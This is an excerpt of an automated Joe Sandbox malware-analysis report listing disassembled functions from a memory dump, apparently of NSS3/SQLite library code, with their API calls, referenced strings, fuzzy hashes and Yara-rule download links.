Associated: 0000000E.00000002.3248022740.000000006D65F000.00000008.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248173444.000000006D660000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248328320.000000006D665000.00000002.00000001.01000000.0000001C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6d480000_232a1df2aa.jbxd

Similarity

API ID: K11_$FreeItem_Util$memcpy$AllocZfreehtonl$DeriveErrorWith
String ID:
API String ID: 1510409361-0
Opcode ID: 425c751ded27321abc86d38c1fc9f8c4aebbdb6a9dc977c0700d671eeae09f3d
Instruction ID: c5f26c83e0f16b2ffc2ab62369a014c0922992686027c8bc7779ac78379b8e1a
Opcode Fuzzy Hash: 425c751ded27321abc86d38c1fc9f8c4aebbdb6a9dc977c0700d671eeae09f3d
Instruction Fuzzy Hash: E871B0B5A042169FDB08CFB9CC84A6AB7B0BF88318F168929E60997711F731D954CB91

Function 6D551CE0 Relevance: 16.2, APIs: 5, Strings: 4, Instructions: 401COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(?,?,00000020), ref: 6D551F19
memcpy.VCRUNTIME140(?,?,00000020), ref: 6D552166
memcpy.VCRUNTIME140(?,?,00000010), ref: 6D55228F
memcpy.VCRUNTIME140(?,?,00000010), ref: 6D5523B8
PR_SetError.NSS3(FFFFE001,00000000), ref: 6D55241C

Strings

model, xrefs: 6D5523CB, 6D5523EC
serial, xrefs: 6D5522A2
manufacturer, xrefs: 6D552179
token, xrefs: 6D551F2C

Memory Dump Source

Source File: 0000000E.00000002.3245470365.000000006D481000.00000020.00000001.01000000.0000001C.sdmp, Offset: 6D480000, based on PE: true

Associated: 0000000E.00000002.3245278272.000000006D480000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247311062.000000006D61F000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247819676.000000006D65E000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248022740.000000006D65F000.00000008.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248173444.000000006D660000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248328320.000000006D665000.00000002.00000001.01000000.0000001C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6d480000_232a1df2aa.jbxd

Similarity

API ID: memcpy$Error
String ID: manufacturer$model$serial$token
API String ID: 3204416626-1906384322
Opcode ID: be54431f13437fc091a53aff4ebce856f3d45b5a1d61d812d9ec386747739613
Instruction ID: 497e68c8f6952e31a51bbc9a6ed16cfa7f83b9bf7f0d4e6ce54c1fbe3069429a
Opcode Fuzzy Hash: be54431f13437fc091a53aff4ebce856f3d45b5a1d61d812d9ec386747739613
Instruction Fuzzy Hash: 88024FA6D0C7C96EF7378670C44C7E77EE09B45324F49186FC6DE4AA83C3A868988751

Function 6D490FE0 Relevance: 16.0, APIs: 6, Strings: 3, Instructions: 227COMMON

Download Yara Rule

APIs

Part of subcall function 6D48CA30: EnterCriticalSection.KERNEL32(?,?,?,6D4EF9C9,?,6D4EF4DA,6D4EF9C9,?,?,6D4B369A), ref: 6D48CA7A
Part of subcall function 6D48CA30: LeaveCriticalSection.KERNEL32(?), ref: 6D48CB26

memset.VCRUNTIME140(00000000,00000000,00000C0A), ref: 6D49103E
EnterCriticalSection.KERNEL32(?), ref: 6D491139
LeaveCriticalSection.KERNEL32(?), ref: 6D491190
sqlite3_free.NSS3(00000000), ref: 6D491227
sqlite3_log.NSS3(0000001B,delayed %dms for lock/sharing conflict at line %d,00000001,0000BCFE), ref: 6D49126E
sqlite3_free.NSS3(?), ref: 6D49127F

Strings

winAccess, xrefs: 6D49129B
delayed %dms for lock/sharing conflict at line %d, xrefs: 6D491267
Pam, xrefs: 6D49109E

Memory Dump Source

Source File: 0000000E.00000002.3245470365.000000006D481000.00000020.00000001.01000000.0000001C.sdmp, Offset: 6D480000, based on PE: true

Associated: 0000000E.00000002.3245278272.000000006D480000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247311062.000000006D61F000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247819676.000000006D65E000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248022740.000000006D65F000.00000008.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248173444.000000006D660000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248328320.000000006D665000.00000002.00000001.01000000.0000001C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6d480000_232a1df2aa.jbxd

Similarity

API ID: CriticalSection$EnterLeavesqlite3_free$memsetsqlite3_log
String ID: Pam$delayed %dms for lock/sharing conflict at line %d$winAccess
API String ID: 2733752649-1295447393
Opcode ID: c4a686f14b537c9d5a19f8bccd9d8161384d08e9348d88de191c2666fbfd7325
Instruction ID: 0862a16b6b6c712cb6393bd8cbd5dc06521261623f76f89132df24b4f6432ea8
Opcode Fuzzy Hash: c4a686f14b537c9d5a19f8bccd9d8161384d08e9348d88de191c2666fbfd7325
Instruction Fuzzy Hash: AD71E435608252ABEF04DF67DC95F7A3B79FB8B310F144229E915DB291DB309C41C692

Function 6D556C00 Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 190memorytimeCOMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE005,00000000,?,?,00000000,00000000,00000000,?,6D501C6F,00000000,00000004,?,?), ref: 6D556C3F

Part of subcall function 6D5AC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6D5AC2BF

PORT_ArenaAlloc_Util.NSS3(?,0000000D,?,?,00000000,00000000,00000000,?,6D501C6F,00000000,00000004,?,?), ref: 6D556C60
PR_ExplodeTime.NSS3(00000000,6D501C6F,?,?,?,?,?,00000000,00000000,00000000,?,6D501C6F,00000000,00000004,?,?), ref: 6D556C94

Strings

gfff, xrefs: 6D556D66
gfff, xrefs: 6D556D30
gfff, xrefs: 6D556CFD
gfff, xrefs: 6D556D9C
gfff, xrefs: 6D556CF5

Memory Dump Source

Source File: 0000000E.00000002.3245470365.000000006D481000.00000020.00000001.01000000.0000001C.sdmp, Offset: 6D480000, based on PE: true

Associated: 0000000E.00000002.3245278272.000000006D480000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247311062.000000006D61F000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247819676.000000006D65E000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248022740.000000006D65F000.00000008.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248173444.000000006D660000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248328320.000000006D665000.00000002.00000001.01000000.0000001C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6d480000_232a1df2aa.jbxd

Similarity

API ID: Alloc_ArenaErrorExplodeTimeUtilValue
String ID: gfff$gfff$gfff$gfff$gfff
API String ID: 3534712800-180463219
Opcode ID: 27004cb7e15114261a8be08a77a4efbd110a4fe133ab2edda18c4ee06aac1cb5
Instruction ID: 78ee6eee386beb12cc31484b2bad0334efcac425b7d8eb57186e488ffcae6f2f
Opcode Fuzzy Hash: 27004cb7e15114261a8be08a77a4efbd110a4fe133ab2edda18c4ee06aac1cb5
Instruction Fuzzy Hash: A3512972B016494FC70CCDADDC526EAB7DAABE4310F48C23AE442DB781D638E912C751

Function 6D5D0F20 Relevance: 15.4, APIs: 3, Strings: 7, Instructions: 394stringCOMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(?,?,-00000001), ref: 6D5D1027
memcpy.VCRUNTIME140(?,?,00000000), ref: 6D5D10B2
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6D5D1353

Strings

%lld, xrefs: 6D5D114B
%02x, xrefs: 6D5D12F6
$, xrefs: 6D5D12A0
-- , xrefs: 6D5D0FF5
'%.*q', xrefs: 6D5D1217, 6D5D1292
NULL, xrefs: 6D5D119E
zeroblob(%d), xrefs: 6D5D1223

Memory Dump Source

Source File: 0000000E.00000002.3245470365.000000006D481000.00000020.00000001.01000000.0000001C.sdmp, Offset: 6D480000, based on PE: true

Associated: 0000000E.00000002.3245278272.000000006D480000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247311062.000000006D61F000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247819676.000000006D65E000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248022740.000000006D65F000.00000008.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248173444.000000006D660000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248328320.000000006D665000.00000002.00000001.01000000.0000001C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6d480000_232a1df2aa.jbxd

Similarity

API ID: memcpy$strlen
String ID: $$%02x$%lld$'%.*q'$-- $NULL$zeroblob(%d)
API String ID: 2619041689-2155869073
Opcode ID: e1b384d21980eda665a89c73d72837497b5ecfb0541cea8ae7057bfd823d3a65
Instruction ID: 80655c5e840872bd463acd098ea2463a83cb998d96bd1dce97668c28d399d6f4
Opcode Fuzzy Hash: e1b384d21980eda665a89c73d72837497b5ecfb0541cea8ae7057bfd823d3a65
Instruction Fuzzy Hash: A1E19B71A0C3819BD749CF68C480A6BBBF1BFCA344F058C1DE98587651E771E845CBA6

Function 6D5D8FB0 Relevance: 14.3, APIs: 6, Strings: 2, Instructions: 289COMMON

Download Yara Rule

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6D5D8FEE
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6D5D90DC
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6D5D9118
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6D5D915C
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6D5D91C2
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6D5D9209

Strings

3333, xrefs: 6D5D925E
UUUU, xrefs: 6D5D9255

Memory Dump Source

Source File: 0000000E.00000002.3245470365.000000006D481000.00000020.00000001.01000000.0000001C.sdmp, Offset: 6D480000, based on PE: true

Associated: 0000000E.00000002.3245278272.000000006D480000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247311062.000000006D61F000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247819676.000000006D65E000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248022740.000000006D65F000.00000008.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248173444.000000006D660000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248328320.000000006D665000.00000002.00000001.01000000.0000001C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6d480000_232a1df2aa.jbxd

Similarity

API ID: _byteswap_ulong$Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: 3333$UUUU
API String ID: 1967222509-2679824526
Opcode ID: cc8fdd7b4a8c6f0a441ee3897208a896fe0d56ef161c7571a303fd934ca220ba
Instruction ID: 44abd641b6a376870f91ecdb442716168a0d2ca54012a019be8ca2e22538fac3
Opcode Fuzzy Hash: cc8fdd7b4a8c6f0a441ee3897208a896fe0d56ef161c7571a303fd934ca220ba
Instruction Fuzzy Hash: 23A18C76E001159BDB08CB68DC91BAEB7B5BB88324F0A4129E919F7341E735AC01CBE5

Function 6D56BD30 Relevance: 13.6, APIs: 9, Instructions: 102COMMON

Download Yara Rule

APIs

NSS_GetAlgorithmPolicy.NSS3(00000006,?), ref: 6D56BD48
NSS_GetAlgorithmPolicy.NSS3(00000006,?), ref: 6D56BD68
NSS_GetAlgorithmPolicy.NSS3(00000005,?), ref: 6D56BD83
NSS_GetAlgorithmPolicy.NSS3(00000005,?), ref: 6D56BD9E
NSS_GetAlgorithmPolicy.NSS3(0000000A,?), ref: 6D56BDB9
NSS_GetAlgorithmPolicy.NSS3(00000007,?), ref: 6D56BDD0
NSS_GetAlgorithmPolicy.NSS3(000000B8,?), ref: 6D56BDEA
NSS_GetAlgorithmPolicy.NSS3(000000BA,?), ref: 6D56BE04
NSS_GetAlgorithmPolicy.NSS3(000000BC,?), ref: 6D56BE1E

Memory Dump Source

Source File: 0000000E.00000002.3245470365.000000006D481000.00000020.00000001.01000000.0000001C.sdmp, Offset: 6D480000, based on PE: true

Associated: 0000000E.00000002.3245278272.000000006D480000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247311062.000000006D61F000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247819676.000000006D65E000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248022740.000000006D65F000.00000008.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248173444.000000006D660000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248328320.000000006D665000.00000002.00000001.01000000.0000001C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6d480000_232a1df2aa.jbxd

Similarity

API ID: AlgorithmPolicy
String ID:
API String ID: 2721248240-0
Opcode ID: 07afdf373e65f686f94741fb9a0cd1d2160bf609d6812f190ea58f4e2d294aff
Instruction ID: 0f5c925d4e52be7be43538a9b0a149fe3e674d5b46c606f7d22f6c00f393d217
Opcode Fuzzy Hash: 07afdf373e65f686f94741fb9a0cd1d2160bf609d6812f190ea58f4e2d294aff
Instruction Fuzzy Hash: 7421E6A7E142CB57FB0866569C43F6B32789BD1749F040814FA16EF662F720DC14C6B2

Function 6D618D20 Relevance: 12.7, APIs: 6, Strings: 1, Instructions: 471threadnetworkCOMMON

Download Yara Rule

APIs

PR_CallOnce.NSS3(6D6614E4,6D5CCC70), ref: 6D618D47
PR_GetCurrentThread.NSS3 ref: 6D618D98

Part of subcall function 6D4F0F00: PR_GetPageSize.NSS3(6D4F0936,FFFFE8AE,?,6D4816B7,00000000,?,6D4F0936,00000000,?,6D48204A), ref: 6D4F0F1B
Part of subcall function 6D4F0F00: PR_NewLogModule.NSS3(clock,6D4F0936,FFFFE8AE,?,6D4816B7,00000000,?,6D4F0936,00000000,?,6D48204A), ref: 6D4F0F25

PR_snprintf.NSS3(?,?,%u.%u.%u.%u,?,?,?,?), ref: 6D618E7B
htons.WSOCK32(?), ref: 6D618EDB
PR_GetCurrentThread.NSS3 ref: 6D618F99
PR_GetCurrentThread.NSS3 ref: 6D61910A

Strings

%u.%u.%u.%u, xrefs: 6D618E74

Memory Dump Source

Source File: 0000000E.00000002.3245470365.000000006D481000.00000020.00000001.01000000.0000001C.sdmp, Offset: 6D480000, based on PE: true

Associated: 0000000E.00000002.3245278272.000000006D480000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247311062.000000006D61F000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247819676.000000006D65E000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248022740.000000006D65F000.00000008.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248173444.000000006D660000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248328320.000000006D665000.00000002.00000001.01000000.0000001C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6d480000_232a1df2aa.jbxd

Similarity

API ID: CurrentThread$CallModuleOncePageR_snprintfSizehtons
String ID: %u.%u.%u.%u
API String ID: 1845059423-1542503432
Opcode ID: a9cf9e9376ec494301387a47eecd228a329cfaf0d36505809319e55d51405a2d
Instruction ID: 0dac84b362037191cf182994322135e6787ce7f45e582bc5c4f55a57dcb8dcf3
Opcode Fuzzy Hash: a9cf9e9376ec494301387a47eecd228a329cfaf0d36505809319e55d51405a2d
Instruction Fuzzy Hash: 62026A3290C2568FDB19CB1DCC597B6BBB2EF4A304F09C25ED8A19B2A1C335D985C791

Function 6D5209A0 Relevance: 11.0, APIs: 7, Instructions: 489memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 6D5206A0: TlsGetValue.KERNEL32 ref: 6D5206C2
Part of subcall function 6D5206A0: EnterCriticalSection.KERNEL32(?), ref: 6D5206D6
Part of subcall function 6D5206A0: PR_Unlock.NSS3 ref: 6D5206EB

memcmp.VCRUNTIME140(00000000,6D509B8A,0000000C,?,?,?,?,?,?,00000000,00000000,?,?,6D509B8A,00000000,k-Pm), ref: 6D5209D9
PORT_ArenaAlloc_Util.NSS3(00000000,0000000C,?,?,?,?,?,?,00000000,00000000,?,?,6D509B8A,00000000,k-Pm), ref: 6D5209F2
TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,00000000,00000000,?,?,6D509B8A,00000000,k-Pm), ref: 6D520A1C
EnterCriticalSection.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000000,00000000,?,?,6D509B8A,00000000,k-Pm), ref: 6D520A30
PR_Unlock.NSS3(?,?,?,?,?,?,?,?,00000000,00000000,?,?,6D509B8A,00000000,k-Pm), ref: 6D520A48

Memory Dump Source

Source File: 0000000E.00000002.3245470365.000000006D481000.00000020.00000001.01000000.0000001C.sdmp, Offset: 6D480000, based on PE: true

Associated: 0000000E.00000002.3245278272.000000006D480000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247311062.000000006D61F000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247819676.000000006D65E000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248022740.000000006D65F000.00000008.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248173444.000000006D660000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248328320.000000006D665000.00000002.00000001.01000000.0000001C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6d480000_232a1df2aa.jbxd

Similarity

API ID: CriticalEnterSectionUnlockValue$Alloc_ArenaUtilmemcmp
String ID:
API String ID: 115324291-0
Opcode ID: 149e2f21cd24182c332204a53164fb439d5e9855469433b89077ed88f4e5869b
Instruction ID: 1182e9d0f5f7649a66abae748570dafb033656aaed169dc247b24f092a4f1df9
Opcode Fuzzy Hash: 149e2f21cd24182c332204a53164fb439d5e9855469433b89077ed88f4e5869b
Instruction Fuzzy Hash: 600212B1D052059FEB088F6ACC50BBB77B5FF88358F014829EA15A7A91E731ED44CB91

Function 6D5D9D90 Relevance: 9.0, APIs: 2, Strings: 3, Instructions: 237COMMON

Download Yara Rule

APIs

_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?,?,?,?,?,?,?,?,?,6D498637,?,?), ref: 6D5D9E88
sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,00011166,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4,?,?,?,?,?,?,?,?,?,?,6D498637), ref: 6D5D9ED6

Strings

database corruption, xrefs: 6D5D9ECA
9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6D5D9EC0
%s at line %d of [%.10s], xrefs: 6D5D9ECF

Memory Dump Source

Source File: 0000000E.00000002.3245470365.000000006D481000.00000020.00000001.01000000.0000001C.sdmp, Offset: 6D480000, based on PE: true

Associated: 0000000E.00000002.3245278272.000000006D480000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247311062.000000006D61F000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247819676.000000006D65E000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248022740.000000006D65F000.00000008.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248173444.000000006D660000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248328320.000000006D665000.00000002.00000001.01000000.0000001C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6d480000_232a1df2aa.jbxd

Similarity

API ID: _byteswap_ulongsqlite3_log
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
API String ID: 912837312-598938438
Opcode ID: 722cec8da495533c6cdccc7d30433e5cffc4245493c1c7a86d057c595b903059
Instruction ID: db83894ad833c2785e1f5eba624e35963b0ef6f5ba84a75abefce6bf1b1d77ec
Opcode Fuzzy Hash: 722cec8da495533c6cdccc7d30433e5cffc4245493c1c7a86d057c595b903059
Instruction Fuzzy Hash: D281A431B041168FCB48CFADC890AEEB3F6EF49300B058969D919AB641D731EE45CFA4

Function 6D5AC9E0 Relevance: 7.7, APIs: 5, Instructions: 187timeCOMMON

Download Yara Rule

APIs

PR_NormalizeTime.NSS3(00000000,?), ref: 6D5ACEA5

Memory Dump Source

Source File: 0000000E.00000002.3245470365.000000006D481000.00000020.00000001.01000000.0000001C.sdmp, Offset: 6D480000, based on PE: true

Associated: 0000000E.00000002.3245278272.000000006D480000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247311062.000000006D61F000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247819676.000000006D65E000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248022740.000000006D65F000.00000008.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248173444.000000006D660000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248328320.000000006D665000.00000002.00000001.01000000.0000001C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6d480000_232a1df2aa.jbxd

Similarity

API ID: NormalizeTime
String ID:
API String ID: 1467309002-0
Opcode ID: 5fcc58efff7f8369045f7a62dc4923ed55276cf7b3e2f41573a4303b45c65239
Instruction ID: 2ae67e20d420a85c2df08b28d24cba2542881da6ba5d696a31d0a0ce9941f43a
Opcode Fuzzy Hash: 5fcc58efff7f8369045f7a62dc4923ed55276cf7b3e2f41573a4303b45c65239
Instruction Fuzzy Hash: 847193719187118FC708CF29C48062ABBE5FFC9314F158A2EE8A9CB7A1E730D955CB91

Function 6D61CDC0 Relevance: 7.4, APIs: 3, Strings: 1, Instructions: 423stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6D61D086
PR_Malloc.NSS3(00000001), ref: 6D61D0B9
PR_Free.NSS3(?), ref: 6D61D138

Strings

>, xrefs: 6D61CF5B

Memory Dump Source

Source File: 0000000E.00000002.3245470365.000000006D481000.00000020.00000001.01000000.0000001C.sdmp, Offset: 6D480000, based on PE: true

Associated: 0000000E.00000002.3245278272.000000006D480000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247311062.000000006D61F000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247819676.000000006D65E000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248022740.000000006D65F000.00000008.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248173444.000000006D660000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248328320.000000006D665000.00000002.00000001.01000000.0000001C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6d480000_232a1df2aa.jbxd

Similarity

API ID: FreeMallocstrlen
String ID: >
API String ID: 1782319670-325317158
Opcode ID: 33f3c904727b78e6a3ccadd60312c31edcb67202b830285271c06c35c0548f6e
Instruction ID: 73285e046fccd742be2f00be35ba360788ab75c0a10f499b5dffb88cf76fc8bd
Opcode Fuzzy Hash: 33f3c904727b78e6a3ccadd60312c31edcb67202b830285271c06c35c0548f6e
Instruction Fuzzy Hash: 9AD15962B4C6470FEB15487C8CA13EEB793A7CA3B4F594339D5229B3E5E6198883C741

Function 6D5BAD50 Relevance: 6.4, APIs: 4, Instructions: 389COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.3245470365.000000006D481000.00000020.00000001.01000000.0000001C.sdmp, Offset: 6D480000, based on PE: true

Associated: 0000000E.00000002.3245278272.000000006D480000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247311062.000000006D61F000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247819676.000000006D65E000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248022740.000000006D65F000.00000008.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248173444.000000006D660000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248328320.000000006D665000.00000002.00000001.01000000.0000001C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6d480000_232a1df2aa.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3b51f2b0af142dcb9e3d6cc93b56a0c539837c91146302045898cd95674ecaf7
Instruction ID: a643343cbd33947dcbc4fc386d6fd0802b053aeb98e41ad51c02bc8d3f73822d
Opcode Fuzzy Hash: 3b51f2b0af142dcb9e3d6cc93b56a0c539837c91146302045898cd95674ecaf7
Instruction Fuzzy Hash: 00F1DE70E042568FDF08CF2AC9A07BA77F4BB8A304F04462DC915D7755EBB4A991CB82

Function 6D5ADFC0 Relevance: 6.3, APIs: 3, Strings: 1, Instructions: 344stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,00000003,?,6D485001,?,00000003,00000000), ref: 6D5ADFD7
memset.VCRUNTIME140(00000000,00000000,?,?,?,00000003,?,6D485001,?), ref: 6D5AE2B7
memcpy.VCRUNTIME140(00000028,00000003,?,?,?,?,?,?,00000003,?,6D485001,?), ref: 6D5AE2DA

Strings

W, xrefs: 6D5AE111

Memory Dump Source

Source File: 0000000E.00000002.3245470365.000000006D481000.00000020.00000001.01000000.0000001C.sdmp, Offset: 6D480000, based on PE: true

Associated: 0000000E.00000002.3245278272.000000006D480000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247311062.000000006D61F000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247819676.000000006D65E000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248022740.000000006D65F000.00000008.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248173444.000000006D660000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248328320.000000006D665000.00000002.00000001.01000000.0000001C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6d480000_232a1df2aa.jbxd

Similarity

API ID: memcpymemsetstrlen
String ID: W
API String ID: 160209724-655174618
Opcode ID: a8e8f0cf7f0c7a6a2b7d1f18879d92e8098bfbfa6e19408acc3db8dda5c5bdfc
Instruction ID: ceaa9da0ff12066ea0b02cadd02b14040947640c07a237a752386e1325f2cc00
Opcode Fuzzy Hash: a8e8f0cf7f0c7a6a2b7d1f18879d92e8098bfbfa6e19408acc3db8dda5c5bdfc
Instruction Fuzzy Hash: 3BC1FB31B042778BDB0DCE2984907BE77B2BF86344F1D8969DC69EBA41D731A901CB91

Function 6D570E20 Relevance: 6.3, APIs: 2, Strings: 2, Instructions: 279COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(00000000,?,00000000,00000000,00000000), ref: 6D571052
memset.VCRUNTIME140(-0000001C,?,?,00000000), ref: 6D571086

Strings

h(Wm, xrefs: 6D570E55, 6D570EC4, 6D570F3A, 6D570FA7
h(Wm, xrefs: 6D571062, 6D57105D, 6D570F37, 6D571081, 6D571082

Memory Dump Source

Source File: 0000000E.00000002.3245470365.000000006D481000.00000020.00000001.01000000.0000001C.sdmp, Offset: 6D480000, based on PE: true

Associated: 0000000E.00000002.3245278272.000000006D480000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247311062.000000006D61F000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247819676.000000006D65E000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248022740.000000006D65F000.00000008.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248173444.000000006D660000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248328320.000000006D665000.00000002.00000001.01000000.0000001C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6d480000_232a1df2aa.jbxd

Similarity

API ID: memcpymemset
String ID: h(Wm$h(Wm
API String ID: 1297977491-1129124426
Opcode ID: dd9ec95fb077661ea4472aaed4fe7920b4a2ca8ef7c0bef4b95949521523992a
